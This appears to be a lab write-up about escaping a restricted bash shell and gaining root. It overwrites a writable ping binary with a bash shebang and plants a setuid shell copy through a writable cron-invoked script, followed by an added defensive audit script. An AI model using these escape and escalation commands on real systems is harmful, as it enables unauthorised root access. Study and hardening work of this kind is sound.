
How to escape a restricted shell in Linux and get root

By Ajay Verma - Saturday, 6 August 2016
I SSHed into the system as restricted1; after login I found I was in a restricted bash shell (rbash).
Several commands were not allowed, and the / character was allowed in arguments but not in the command name,
so I could not call any command by its path.
So I used the command below to list the files and their permissions:
ls -la ./bin

I found that I had write permission on the ping file.
And why is there a tee command? (That is a hint.)
So I used tee to write a bash shebang script into ping with the commands below:
echo '#!' | tee ./bin/ping
echo '/bin/bash' | tee -a ./bin/ping


Then I ran the ping command and escaped from the restricted shell.
I was no longer in a restricted shell.
I set my PATH so I did not have to specify full paths to programs:
export PATH=$PATH:/bin
export PATH=$PATH:/usr/bin


After performing lots of vulnerability tests I found that there was a cron job running, so I switched to
cd /etc/cron.minutely/mtr

but the file had no write permission. After checking the file using
cat /etc/cron.minutely/mtr

I saw that this file was including another file,
/usr/bin/mtr-check

and I had write permission on it, as checked with
ls -la /usr/bin/mtr-check

so I altered its content to the line below, using the nano editor.
cp /bin/sh /home/restricted1/ud64 && chmod 4755 /home/restricted1/ud64

cron will copy /bin/sh to my home directory (restricted1) and set the setuid bit using chmod 4755 (so the copy runs setuid on execution).
When I switched to /home/restricted1 I found ud64, and after running
./ud64

I got root. To check, I ran
whoami

and finally, to read the contents, I used the line below:
cat /root/secret.txt

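Both steps above depend on the same misconfiguration: a file that runs with elevated trust (a command inside the restricted shell's bin directory, or a script invoked by a root cron job) is writable by an unprivileged user. The audit script below is an added example, not part of the original post; it flags such files and shows the permission fix. The directory layout (bin/ping, bin/tee, etc/cron.minutely/mtr, usr/bin/mtr-check) is constructed in a temporary directory to mirror the post and is not a real system tree.

```shell
#!/bin/sh
# Added audit example (not from the original post). It checks for the two
# weaknesses the walkthrough relied on: a writable command inside a restricted
# shell's bin directory, and a root cron script that executes a file a normal
# user can modify. The sample tree below is constructed in a temp directory;
# the names mirror the post (ping, tee, mtr, mtr-check) but are not real files.

# Regular files under $1 that are group- or world-writable (mode bits 020/002).
# One path per line; empty output means nothing risky was found.
find_writable_commands() {
    find "$1" -type f \( -perm -020 -o -perm -002 \) -print | sort
}

# Absolute paths referenced from a cron script $1 whose target is a regular
# file writable by group or others. -L follows symlinks so a link such as
# /bin/sh -> dash is judged by its target's mode, not the link's own 0777.
find_writable_cron_targets() {
    grep -o '/[A-Za-z0-9._/-]*' "$1" | sort -u | while read -r p; do
        [ -f "$p" ] || continue
        if [ -n "$(find -L "$p" -maxdepth 0 -type f \( -perm -020 -o -perm -002 \) -print)" ]; then
            echo "$p"
        fi
    done
}

# Remediation for a flagged file: drop write access for group and others.
# On a real host the file should also be root-owned (chown root:root), which
# this unprivileged example cannot do.
harden_file() {
    chmod go-w "$1"
}

# Constructed sample tree reproducing the post's layout; prints its root.
make_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/bin" "$root/usr/bin" "$root/etc/cron.minutely"
    printf '#!/bin/sh\necho pong\n' > "$root/bin/ping"
    printf '#!/bin/sh\necho tee\n'  > "$root/bin/tee"
    printf '#!/bin/sh\necho ok\n'   > "$root/usr/bin/mtr-check"
    printf '#!/bin/sh\n%s/usr/bin/mtr-check\n' "$root" > "$root/etc/cron.minutely/mtr"
    chmod 777 "$root/bin/ping"            # weak setting: any user can edit the command
    chmod 755 "$root/bin/tee"
    chmod 666 "$root/usr/bin/mtr-check"   # weak setting: cron runs user-editable code
    chmod 755 "$root/etc/cron.minutely/mtr"
    echo "$root"
}

# Usage: audit the sample tree, then show that hardening clears the findings.
if [ "${1:-}" = "--demo" ]; then
    ROOT=$(make_sample_tree)
    echo "writable commands in $ROOT/bin:"
    find_writable_commands "$ROOT/bin"
    echo "writable cron targets:"
    find_writable_cron_targets "$ROOT/etc/cron.minutely/mtr"
    harden_file "$ROOT/bin/ping"
    harden_file "$ROOT/usr/bin/mtr-check"
    echo "findings after hardening: $(find_writable_commands "$ROOT/bin")$(find_writable_cron_targets "$ROOT/etc/cron.minutely/mtr")"
    rm -rf "$ROOT"
fi
```

Run it with --demo to see the two findings and then an empty result after harden_file. On a real system the same two functions can be pointed at the restricted shell's command directory (for example the bin directory rbash users are limited to) and at each script under /etc/cron.*; a non-empty result means a cron job or restricted command is executing content an ordinary user can rewrite.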
I hope this tutorial helps you understand the security risk associated with improper file permissions.
Thanks.. :) ./unknowndevice64
